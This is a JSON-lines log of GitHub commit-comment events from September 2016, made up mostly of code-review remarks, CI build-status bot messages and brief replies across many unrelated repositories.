{"id":"4590466653","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19098341,"position":null,"line":null,"path":null,"commit_id":"8aa98e0d80be375991a99493164b6ed7bc23efca","created_at":"2016-09-20T15:33:04Z","updated_at":"2016-09-20T15:33:04Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8aa98e0d80be375991a99493164b6ed7bc23efca-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8aa98e0d80be375991a99493164b6ed7bc23efca-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T15:33:04Z"}
{"id":"4590467208","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098342,"position":5,"line":5,"path":"01-JS-DOM-APIs/assets/scripts.js","commit_id":"8f7ef4651a8fcd97333d5bb4a9427d60218b708d","created_at":"2016-09-20T15:33:09Z","updated_at":"2016-09-20T15:33:09Z","body":"Add a blank line after var declaration. Also declare `i` at the top of the function."}},"created_at":"2016-09-20T15:33:09Z"}
{"id":"4590467754","type":"CommitCommentEvent","actor":{"login":"rascarlo"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19098345,"position":null,"line":null,"path":null,"commit_id":"cb3f59c4ed6376e6ae9b1867a2579b25366c4fd3","created_at":"2016-09-20T15:33:15Z","updated_at":"2016-09-20T15:33:15Z","body":"@Garduna1976 awesome! are you a robot? :+1: "}},"created_at":"2016-09-20T15:33:15Z"}
{"id":"4590469179","type":"CommitCommentEvent","actor":{"login":"yasu80"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19098350,"position":null,"line":null,"path":null,"commit_id":"75c28562546c67ef3d61573fd5d50253da609b0e","created_at":"2016-09-20T15:33:25Z","updated_at":"2016-09-20T15:33:25Z","body":"\u001b$B$*$=$^$-$J$,$i\u001b(Bmerge\u001b$BJs9p$7$^$9\u001b(B.\n\n\u001b$B5$$r$D$1$^$9!&!&!&\u001b(B\n\n\u001b$B$\"$H\u001b(B, \u001b$B2sO)?^$K%3%s%H%m!<%i>pJs$K?($l$k$+$OG:$_$^$7$?$,\u001b(B, \u001b$B:\\$;$F$bB;$O$7$J$$$N$G:\\$;$^$7$?\u001b(B.\n\n\n\n/************signiture************\n*\"\u001b$BFA0B0l\u001b(B\"Hajime Tokuyasu\n*p111026h@mail.kyutech.jp\n*Kyutech\n************signiture************/\n\n\n________________________________\n\u001b$B:9=P?M\u001b(B: Doi Yusuke <notifications@github.com>\n\u001b$BAw?.F|;~\u001b(B: 2016\u001b$BG/\u001b(B9\u001b$B7n\u001b(B21\u001b$BF|\u001b(B 0:28:17\n\u001b$B08@h\u001b(B: CIR-KIT/fifth_robot_pkg\nCC: p111026h; Mention\n\u001b$B7oL>\u001b(B: Re: [CIR-KIT/fifth_robot_pkg] Merge branch 'develop' into fig-pow-supply-patch (75c2856)\n\n\nHey @yasu80<https://github.com/yasu80>\n\nPull-request\u001b$B$r<u$1<h$k$H$-$O\u001b(Bdevelop\u001b$BB&$+$i\u001b(Bmerge\u001b$B$9$kI,MW$O$J$$$<!*\u001b(B\n\u001b$B;^$OJ,$+$l$F$=$N$^$^9gN.$9$k$N$,\u001b(B(\u001b$B4pK\\E*$K$O\u001b(B)\u001b$BH~$7$$$<!#\u001b(B\n\u001b$B:#2s$O%3%s%U%j%/%H$b$J$+$C$?$G$9$+$i$M!#\u001b(B\n\n-\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub<https://github.com/CIR-KIT/fifth_robot_pkg/commit/75c28562546c67ef3d61573fd5d50253da609b0e#commitcomment-19098255>, or mute the thread<https://github.com/notifications/unsubscribe-auth/APRjoKBbps4YY3nK0VLOZ39K4DPEvW0Aks5qr_uRgaJpZM4KBxS5>.\n"}},"created_at":"2016-09-20T15:33:25Z"}
{"id":"4590471208","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19098353,"position":null,"line":null,"path":null,"commit_id":"7e19227245fc63508f1f4fcfc1a83583abb3f7da","created_at":"2016-09-20T15:33:44Z","updated_at":"2016-09-20T15:33:44Z","body":"This will allow all players to use commands. "}},"created_at":"2016-09-20T15:33:44Z"}
{"id":"4590471818","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098356,"position":4,"line":4,"path":"01-JS-DOM-APIs/assets/scripts.js","commit_id":"8f7ef4651a8fcd97333d5bb4a9427d60218b708d","created_at":"2016-09-20T15:33:49Z","updated_at":"2016-09-20T15:33:49Z","body":"Use single quotes for strings in javascript."}},"created_at":"2016-09-20T15:33:49Z"}
{"id":"4590478685","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098369,"position":17,"line":17,"path":"01-JS-DOM-APIs/assets/scripts.js","commit_id":"8f7ef4651a8fcd97333d5bb4a9427d60218b708d","created_at":"2016-09-20T15:34:50Z","updated_at":"2016-09-20T15:34:50Z","body":"Try `textContent`"}},"created_at":"2016-09-20T15:34:50Z"}
{"id":"4590480711","type":"CommitCommentEvent","actor":{"login":"paphonbth"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19098372,"position":5,"line":0,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/notifications/NotificationHooks.java","commit_id":"b85c10bf01ef4711716430a559f2e705145daf05","created_at":"2016-09-20T15:35:08Z","updated_at":"2016-09-20T15:35:08Z","body":"Actually, heads ups are the most annoying thing on Lollipop. They're broken. You can't swipe them down to open the notification panel and can't swipe them up to hide them either."}},"created_at":"2016-09-20T15:35:08Z"}
{"id":"4590481161","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098374,"position":12,"line":12,"path":"01-JS-DOM-APIs/assets/scripts.js","commit_id":"8f7ef4651a8fcd97333d5bb4a9427d60218b708d","created_at":"2016-09-20T15:35:12Z","updated_at":"2016-09-20T15:35:12Z","body":"Review indentation"}},"created_at":"2016-09-20T15:35:12Z"}
{"id":"4590482985","type":"CommitCommentEvent","actor":{"login":"jasontsh"},"repo":{"name":"pennlabs/penn-sdk-python"},"payload":{"comment":{"id":19098377,"position":null,"line":null,"path":null,"commit_id":"879746b9dd399c0c5a2d086e527694b9045955c9","created_at":"2016-09-20T15:35:27Z","updated_at":"2016-09-20T15:35:27Z","body":"LGTM"}},"created_at":"2016-09-20T15:35:27Z"}
{"id":"4590490602","type":"CommitCommentEvent","actor":{"login":"jasontsh"},"repo":{"name":"pennlabs/penn-sdk-python"},"payload":{"comment":{"id":19098399,"position":null,"line":null,"path":null,"commit_id":"192e0e515e7a6ecf9aa66c722c1520bac37a4c6d","created_at":"2016-09-20T15:36:36Z","updated_at":"2016-09-20T15:36:36Z","body":"LGTM"}},"created_at":"2016-09-20T15:36:36Z"}
{"id":"4590498387","type":"CommitCommentEvent","actor":{"login":"treeowl"},"repo":{"name":"haskell/containers"},"payload":{"comment":{"id":19098410,"position":null,"line":null,"path":null,"commit_id":"30cee02e118ad67343834aed08c7e27b04858a31","created_at":"2016-09-20T15:37:48Z","updated_at":"2016-09-20T15:37:48Z","body":"Oh, I see you came up with your own, rather different, representation. This will be interesting to resolve. Maybe @wrengr's plan will not work out."}},"created_at":"2016-09-20T15:37:48Z"}
{"id":"4590498483","type":"CommitCommentEvent","actor":{"login":"muffato"},"repo":{"name":"Ensembl/ensembl-compara"},"payload":{"comment":{"id":19098411,"position":14,"line":1781,"path":"modules/Bio/EnsEMBL/Compara/PipeConfig/ProteinTrees_conf.pm","commit_id":"baa8332b72ce040c2e89218dcadf0736be4ccf3c","created_at":"2016-09-20T15:37:49Z","updated_at":"2016-09-20T15:37:49Z","body":"We have exposed all the other capacity parameters, can you do that, please ?"}},"created_at":"2016-09-20T15:37:49Z"}
{"id":"4590500541","type":"CommitCommentEvent","actor":{"login":"Garduna1976"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19098418,"position":null,"line":null,"path":null,"commit_id":"cb3f59c4ed6376e6ae9b1867a2579b25366c4fd3","created_at":"2016-09-20T15:38:08Z","updated_at":"2016-09-20T15:38:08Z","body":"lol no just bored 😂\n\n2016-09-20 17:33 GMT+02:00 rascarlo <notifications@github.com>:\n\n> @Garduna1976 <https://github.com/Garduna1976> awesome! are you a robot? 👍\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TilesLocalization/resources/commit/cb3f59c4ed6376e6ae9b1867a2579b25366c4fd3#commitcomment-19098345>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVOo16gZkp1RZglmNABzm9PlMSjWYJvWks5qr_y7gaJpZM4KBxrH>\n> .\n>\n"}},"created_at":"2016-09-20T15:38:08Z"}
{"id":"4590504651","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098424,"position":21,"line":21,"path":"01-JS-DOM-APIs/index.html","commit_id":"8f7ef4651a8fcd97333d5bb4a9427d60218b708d","created_at":"2016-09-20T15:38:44Z","updated_at":"2016-09-20T15:38:44Z","body":"Try with something like `addEventListener('click', getJoke())`"}},"created_at":"2016-09-20T15:38:44Z"}
{"id":"4590506481","type":"CommitCommentEvent","actor":{"login":"vlj91"},"repo":{"name":"alces-software/flight-appliance-docs"},"payload":{"comment":{"id":19098429,"position":391,"line":391,"path":"docs/source/pbspro/pbspro.rst","commit_id":"3aac8e8995314598f08e66d4f0a3553314dfcc51","created_at":"2016-09-20T15:39:00Z","updated_at":"2016-09-20T15:39:00Z","body":"Done in https://github.com/alces-software/flight-appliance-docs/commit/3b531eaa73a755296d22a6e397bae6fb67f38c30 - thanks!"}},"created_at":"2016-09-20T15:39:00Z"}
{"id":"4590510333","type":"CommitCommentEvent","actor":{"login":"williamyu-xingyunzh"},"repo":{"name":"xingyunzh/Camps"},"payload":{"comment":{"id":19098433,"position":2,"line":2,"path":"routes/router.js","commit_id":"8991009029e2dc2254fd5ae5246752e8ed4227e9","created_at":"2016-09-20T15:39:36Z","updated_at":"2016-09-20T15:39:36Z","body":"Please keep the demo api there before you release the working ones to me. I'm using it for front end dev. "}},"created_at":"2016-09-20T15:39:36Z"}
{"id":"4590510404","type":"CommitCommentEvent","actor":{"login":"muffato"},"repo":{"name":"Ensembl/ensembl-compara"},"payload":{"comment":{"id":19098434,"position":5,"line":1572,"path":"modules/Bio/EnsEMBL/Compara/PipeConfig/ProteinTrees_conf.pm","commit_id":"baa8332b72ce040c2e89218dcadf0736be4ccf3c","created_at":"2016-09-20T15:39:36Z","updated_at":"2016-09-20T15:39:36Z","body":"Did you really need 8Gb ?? Even for EG it's only 500 Mb (although I'm not sure they've updated it for fungi/pan)"}},"created_at":"2016-09-20T15:39:36Z"}
{"id":"4590513744","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19098438,"position":null,"line":null,"path":null,"commit_id":"a795283e659e1c21866b922990b698ad7c0e6438","created_at":"2016-09-20T15:40:07Z","updated_at":"2016-09-20T15:40:07Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1074](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13668&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 242, ignored: 3 Build time: 00:07:33"}},"created_at":"2016-09-20T15:40:07Z"}
{"id":"4590514943","type":"CommitCommentEvent","actor":{"login":"ant8e"},"repo":{"name":"ScalaRomandie/Raffle"},"payload":{"comment":{"id":19098440,"position":null,"line":null,"path":null,"commit_id":"dacd87d59e2d73fd85773a87c5fe28ed98038696","created_at":"2016-09-20T15:40:16Z","updated_at":"2016-09-20T15:40:16Z","body":"Good catch !\r\n\r\nAt the end It does not matter that much, because the members must trust the organizers to do the draw in good faith.\r\n\r\n "}},"created_at":"2016-09-20T15:40:16Z"}
{"id":"4590516967","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19098448,"position":null,"line":null,"path":null,"commit_id":"6ba961fded89ea033fca1fb5cce20da6af6c3234","created_at":"2016-09-20T15:40:34Z","updated_at":"2016-09-20T15:40:34Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1075](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13672&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T15:40:34Z"}
{"id":"4590518471","type":"CommitCommentEvent","actor":{"login":"demadelosrios"},"repo":{"name":"TriyoTec/ProjetosProtheus"},"payload":{"comment":{"id":19098454,"position":null,"line":null,"path":null,"commit_id":"ebb5c0371ff38028b18be2b0e445f3729cecdd99","created_at":"2016-09-20T15:40:47Z","updated_at":"2016-09-20T15:40:47Z","body":"Legal.\r\n"}},"created_at":"2016-09-20T15:40:47Z"}
{"id":"4590518998","type":"CommitCommentEvent","actor":{"login":"demadelosrios"},"repo":{"name":"TriyoTec/ProjetosProtheus"},"payload":{"comment":{"id":19098456,"position":null,"line":null,"path":null,"commit_id":"ebb5c0371ff38028b18be2b0e445f3729cecdd99","created_at":"2016-09-20T15:40:52Z","updated_at":"2016-09-20T15:40:52Z","body":"@VctrAndrade "}},"created_at":"2016-09-20T15:40:52Z"}
{"id":"4590519437","type":"CommitCommentEvent","actor":{"login":"muffato"},"repo":{"name":"Ensembl/ensembl-compara"},"payload":{"comment":{"id":19098457,"position":null,"line":null,"path":null,"commit_id":"b77c020774323799cefee93735a4eda900d4e64f","created_at":"2016-09-20T15:40:56Z","updated_at":"2016-09-20T15:40:56Z","body":"You had already pushed this change but I have reverted it because waiting for 8 cores takes too much time. 4 cores are faster to allocate"}},"created_at":"2016-09-20T15:40:56Z"}
{"id":"4590521711","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098465,"position":32,"line":32,"path":"01-JS-DOM-APIs/index.html","commit_id":"8f7ef4651a8fcd97333d5bb4a9427d60218b708d","created_at":"2016-09-20T15:41:17Z","updated_at":"2016-09-20T15:41:17Z","body":"Try to add something like `document.addEventListener('DOMContentLoaded', fadeIn)`. You will need to make a little refactor to `fadeIn`"}},"created_at":"2016-09-20T15:41:17Z"}
{"id":"4590528560","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19098483,"position":27,"line":235,"path":"californium-core/src/main/java/org/eclipse/californium/core/CoapServer.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-20T15:42:17Z","updated_at":"2016-09-20T15:42:17Z","body":"Ok I look at  your code. We did approximatively the same thing.\r\n\r\nThe main difference was the loop :\r\n```java\r\n     for (Endpoint ep : endpoints) {\r\n\t  ep.destroy();\r\n     }\r\n```\r\nI think that this could be a problem to destroy endpoint before we considered that task is terminated.\r\n\r\nYou put it at the beginning of the code, I put it at the end. Maybe the right way is to put it just before the shutdownNow. I mean when we consider that we will not be able to terminate task properly. WDYT ?"}},"created_at":"2016-09-20T15:42:17Z"}
{"id":"4590530160","type":"CommitCommentEvent","actor":{"login":"zdravkokarabenchev"},"repo":{"name":"zdravkokarabenchev/den2"},"payload":{"comment":{"id":19098486,"position":null,"line":null,"path":null,"commit_id":"86de91f6f6ec67ee974f6f2327e6f56dc9b3a052","created_at":"2016-09-20T15:42:31Z","updated_at":"2016-09-20T15:42:31Z","body":"aaaa"}},"created_at":"2016-09-20T15:42:31Z"}
{"id":"4590530671","type":"CommitCommentEvent","actor":{"login":"muffato"},"repo":{"name":"Ensembl/ensembl-compara"},"payload":{"comment":{"id":19098487,"position":5,"line":118,"path":"modules/Bio/EnsEMBL/Compara/PipeConfig/Parts/CAFE.pm","commit_id":"9b88fe4c850d99b677aa44804416ee4e1d558be2","created_at":"2016-09-20T15:42:36Z","updated_at":"2016-09-20T15:42:36Z","body":"Again, do you really need *8* Gb ? If we ask too much, 1) the job can be pending longer and 2) we may be penalized because we don't use the memory we've requested"}},"created_at":"2016-09-20T15:42:36Z"}
{"id":"4590538032","type":"CommitCommentEvent","actor":{"login":"mipapo"},"repo":{"name":"Runalyze/Runalyze"},"payload":{"comment":{"id":19098501,"position":null,"line":null,"path":null,"commit_id":"bab6d2a46177a46f8e7b8f69de65ea325b0b995a","created_at":"2016-09-20T15:43:41Z","updated_at":"2016-09-20T15:43:41Z","body":"#1942"}},"created_at":"2016-09-20T15:43:41Z"}
{"id":"4590539431","type":"CommitCommentEvent","actor":{"login":"bsweeney"},"repo":{"name":"dompdf/dompdf"},"payload":{"comment":{"id":19098504,"position":null,"line":null,"path":null,"commit_id":"1fa43aa08ab5264b1d3713afa9ed96f886bd4638","created_at":"2016-09-20T15:43:54Z","updated_at":"2016-09-20T15:43:54Z","body":"Closes #1008."}},"created_at":"2016-09-20T15:43:54Z"}
{"id":"4590543360","type":"CommitCommentEvent","actor":{"login":"Joeri-MS"},"repo":{"name":"Joeri-MS/scap-security-guide"},"payload":{"comment":{"id":19098512,"position":null,"line":null,"path":null,"commit_id":"e96e7883056e93a5058890b0cb4c44160aa5ed69","created_at":"2016-09-20T15:44:30Z","updated_at":"2016-09-20T15:44:30Z","body":"Belongs to Issue #1469"}},"created_at":"2016-09-20T15:44:30Z"}
{"id":"4590545472","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098518,"position":22,"line":22,"path":"01-JS-DOM-APIs/ex7/scripts.js","commit_id":"99073e360e714993c0bd73b2d67c0302a731093e","created_at":"2016-09-20T15:44:49Z","updated_at":"2016-09-20T15:44:49Z","body":"Whenever you need to do more than one thing with a DOM element, put it into a var so you don't need to search for it in the DOM every time."}},"created_at":"2016-09-20T15:44:49Z"}
{"id":"4590546641","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"pedroamarques/EDL"},"payload":{"comment":{"id":19098523,"position":null,"line":null,"path":null,"commit_id":"04331f8751a018e2cd317c48a9f8efe529ee46dc","created_at":"2016-09-20T15:45:00Z","updated_at":"2016-09-20T15:45:00Z","body":"Vocês tem 6.5 pontos pra dividir, como vai ser?"}},"created_at":"2016-09-20T15:45:00Z"}
{"id":"4590550666","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19098534,"position":null,"line":null,"path":null,"commit_id":"5e7c6616171106867f7fdf52ef1526e0c3dcb6e6","created_at":"2016-09-20T15:45:35Z","updated_at":"2016-09-20T15:45:35Z","body":"https://github.com/mono/monodevelop/commit/547329a95e82794bfa92b98f47190a29c7da498f"}},"created_at":"2016-09-20T15:45:35Z"}
{"id":"4590552088","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19098540,"position":null,"line":null,"path":null,"commit_id":"5e7c6616171106867f7fdf52ef1526e0c3dcb6e6","created_at":"2016-09-20T15:45:48Z","updated_at":"2016-09-20T15:45:48Z","body":"Fixing the bug in a different way needs more analysis."}},"created_at":"2016-09-20T15:45:48Z"}
{"id":"4590552100","type":"CommitCommentEvent","actor":{"login":"sdeleuze"},"repo":{"name":"sdeleuze/spring-framework"},"payload":{"comment":{"id":19098541,"position":79,"line":77,"path":"spring-web/src/main/java/org/springframework/http/codec/AbstractServerHttpMessageWriter.java","commit_id":"b17f596f60fac7af458e6cf5b3cfcb911d0c3744","created_at":"2016-09-20T15:45:49Z","updated_at":"2016-09-20T15:45:49Z","body":"Oh indeed, I see what you mean, I am going to modify that."}},"created_at":"2016-09-20T15:45:49Z"}
{"id":"4590553409","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19098546,"position":null,"line":null,"path":null,"commit_id":"d7e01fe50007be4fcf5ee53befb02123cff2c785","created_at":"2016-09-20T15:46:02Z","updated_at":"2016-09-20T15:46:02Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 181](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1212&buildTypeId=Xbim_XbimExchange_XbimExchange) is now running\n"}},"created_at":"2016-09-20T15:46:02Z"}
{"id":"4590555718","type":"CommitCommentEvent","actor":{"login":"Seanyhorny77"},"repo":{"name":"fastlane/fastlane"},"payload":{"comment":{"id":19098552,"position":102,"line":102,"path":"fastlane/lib/fastlane/actions/device_grid/device_grid.rb","commit_id":"f742a5c0f097ce00c03445e3a573eca833f9910a","created_at":"2016-09-20T15:46:22Z","updated_at":"2016-09-20T15:46:22Z","body":"Www.adultfreindfinder.com"}},"created_at":"2016-09-20T15:46:22Z"}
{"id":"4590557027","type":"CommitCommentEvent","actor":{"login":"rascarlo"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19098557,"position":null,"line":null,"path":null,"commit_id":"cb3f59c4ed6376e6ae9b1867a2579b25366c4fd3","created_at":"2016-09-20T15:46:34Z","updated_at":"2016-09-20T15:46:34Z","body":"well we will soon get some root action!"}},"created_at":"2016-09-20T15:46:34Z"}
{"id":"4590557184","type":"CommitCommentEvent","actor":{"login":"am-ivanov"},"repo":{"name":"khokhlov/rgrid"},"payload":{"comment":{"id":19098559,"position":70,"line":402,"path":"rgrid/darraycontainer.h","commit_id":"a8d71069c8e9702b5febca26b0034bf1f4ba35ec","created_at":"2016-09-20T15:46:35Z","updated_at":"2016-09-20T15:46:35Z","body":"Nice bug"}},"created_at":"2016-09-20T15:46:35Z"}
{"id":"4590559265","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098564,"position":4,"line":4,"path":"01-JS-DOM-APIs/ex7/scripts.js","commit_id":"99073e360e714993c0bd73b2d67c0302a731093e","created_at":"2016-09-20T15:46:55Z","updated_at":"2016-09-20T15:46:55Z","body":"Add blank line after var declaration"}},"created_at":"2016-09-20T15:46:55Z"}
{"id":"4590559414","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19098565,"position":null,"line":null,"path":null,"commit_id":"86bd7351aac4a035eb4f6d6317bec7c80882bec5","created_at":"2016-09-20T15:46:56Z","updated_at":"2016-09-20T15:46:56Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33039/testReport/) for this commit**"}},"created_at":"2016-09-20T15:46:56Z"}
{"id":"4590560787","type":"CommitCommentEvent","actor":{"login":"gsaponaro"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":19098571,"position":null,"line":null,"path":null,"commit_id":"32964d1c9ef4b06c4dd29de13458643cee2b947a","created_at":"2016-09-20T15:47:08Z","updated_at":"2016-09-20T15:47:08Z","body":"Just curious whether this change will cause any overhead (on the computation or on the network). It could be negligible."}},"created_at":"2016-09-20T15:47:08Z"}
{"id":"4590560971","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19098573,"position":null,"line":null,"path":null,"commit_id":"d7e01fe50007be4fcf5ee53befb02123cff2c785","created_at":"2016-09-20T15:47:10Z","updated_at":"2016-09-20T15:47:10Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 181](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1212&buildTypeId=Xbim_XbimExchange_XbimExchange) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:09"}},"created_at":"2016-09-20T15:47:10Z"}
{"id":"4590563600","type":"CommitCommentEvent","actor":{"login":"midenok"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19098581,"position":null,"line":null,"path":null,"commit_id":"27ba5999e7d32a9c4b2f78654c8a7927c8d959d9","created_at":"2016-09-20T15:47:33Z","updated_at":"2016-09-20T15:47:33Z","body":"Needs testing."}},"created_at":"2016-09-20T15:47:33Z"}
{"id":"4590564227","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098583,"position":1,"line":1,"path":"01-JS-DOM-APIs/ex7/scripts.js","commit_id":"99073e360e714993c0bd73b2d67c0302a731093e","created_at":"2016-09-20T15:47:39Z","updated_at":"2016-09-20T15:47:39Z","body":"Add spaces before and after `(config)`"}},"created_at":"2016-09-20T15:47:39Z"}
{"id":"4590564446","type":"CommitCommentEvent","actor":{"login":"YamaCIR-KIT"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19098585,"position":null,"line":null,"path":null,"commit_id":"75c28562546c67ef3d61573fd5d50253da609b0e","created_at":"2016-09-20T15:47:41Z","updated_at":"2016-09-20T15:47:41Z","body":"yasu80のコメント全く読めないんだぜ"}},"created_at":"2016-09-20T15:47:41Z"}
{"id":"4590567010","type":"CommitCommentEvent","actor":{"login":"fmrmx"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19098594,"position":59,"line":59,"path":"sql/updates/world/2015_07_25_10_world_2015_07_25_03.sql","commit_id":"0d9a34a65bb2be0f5f6ea3dcd8e7ae973d0b866f","created_at":"2016-09-20T15:48:04Z","updated_at":"2016-09-20T15:48:04Z","body":"a"}},"created_at":"2016-09-20T15:48:04Z"}
{"id":"4590573207","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098606,"position":24,"line":24,"path":"01-JS-DOM-APIs/ex7/scripts.js","commit_id":"99073e360e714993c0bd73b2d67c0302a731093e","created_at":"2016-09-20T15:49:01Z","updated_at":"2016-09-20T15:49:01Z","body":"You can remove this `concole.log()`"}},"created_at":"2016-09-20T15:49:01Z"}
{"id":"4590575529","type":"CommitCommentEvent","actor":{"login":"yoku0825"},"repo":{"name":"innotop/innotop"},"payload":{"comment":{"id":19098607,"position":null,"line":null,"path":null,"commit_id":"f752c37b4199ef5aa7c134a4bda9a8025adfc46e","created_at":"2016-09-20T15:49:22Z","updated_at":"2016-09-20T15:49:22Z","body":"I seem that has already fixed in 0d64c78264818a1e56772bb9425ab1177325ffb9\r\n\r\nWould you try again current master branch?"}},"created_at":"2016-09-20T15:49:22Z"}
{"id":"4590576098","type":"CommitCommentEvent","actor":{"login":"benjaoming"},"repo":{"name":"learningequality/ka-lite"},"payload":{"comment":{"id":19098608,"position":7,"line":9,"path":"docs/installguide/advanced.rst","commit_id":"da27c57bcfb8df752046496c2438e0f2828b228e","created_at":"2016-09-20T15:49:27Z","updated_at":"2016-09-20T15:49:27Z","body":"I may have missed this, but I'm doing it now :D"}},"created_at":"2016-09-20T15:49:27Z"}
{"id":"4590583687","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19098622,"position":null,"line":null,"path":null,"commit_id":"6ba961fded89ea033fca1fb5cce20da6af6c3234","created_at":"2016-09-20T15:50:33Z","updated_at":"2016-09-20T15:50:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1075](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13672&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 241, ignored: 3 Build time: 00:09:58"}},"created_at":"2016-09-20T15:50:33Z"}
{"id":"4590584120","type":"CommitCommentEvent","actor":{"login":"FreakofKnuth"},"repo":{"name":"whiskeyromeo/CommunityQuestionAnswering"},"payload":{"comment":{"id":19098624,"position":90,"line":90,"path":"vomitRepo/whiskeyPrimer2.py","commit_id":"a4e48129d57cf471fd7f81be7fbcc07096055079","created_at":"2016-09-20T15:50:36Z","updated_at":"2016-09-20T15:50:36Z","body":"#Removes punctuation"}},"created_at":"2016-09-20T15:50:36Z"}
{"id":"4590590495","type":"CommitCommentEvent","actor":{"login":"FreakofKnuth"},"repo":{"name":"whiskeyromeo/CommunityQuestionAnswering"},"payload":{"comment":{"id":19098641,"position":89,"line":89,"path":"vomitRepo/whiskeyPrimer2.py","commit_id":"a4e48129d57cf471fd7f81be7fbcc07096055079","created_at":"2016-09-20T15:51:31Z","updated_at":"2016-09-20T15:51:31Z","body":"#Removes punctuation"}},"created_at":"2016-09-20T15:51:31Z"}
{"id":"4590592586","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":19098648,"position":null,"line":null,"path":null,"commit_id":"32964d1c9ef4b06c4dd29de13458643cee2b947a","created_at":"2016-09-20T15:51:46Z","updated_at":"2016-09-20T15:51:46Z","body":"@gsaponaro as of now it's a temporary fix for us we'd like to keep track of.\r\nVery likely, it'll disappear soon."}},"created_at":"2016-09-20T15:51:46Z"}
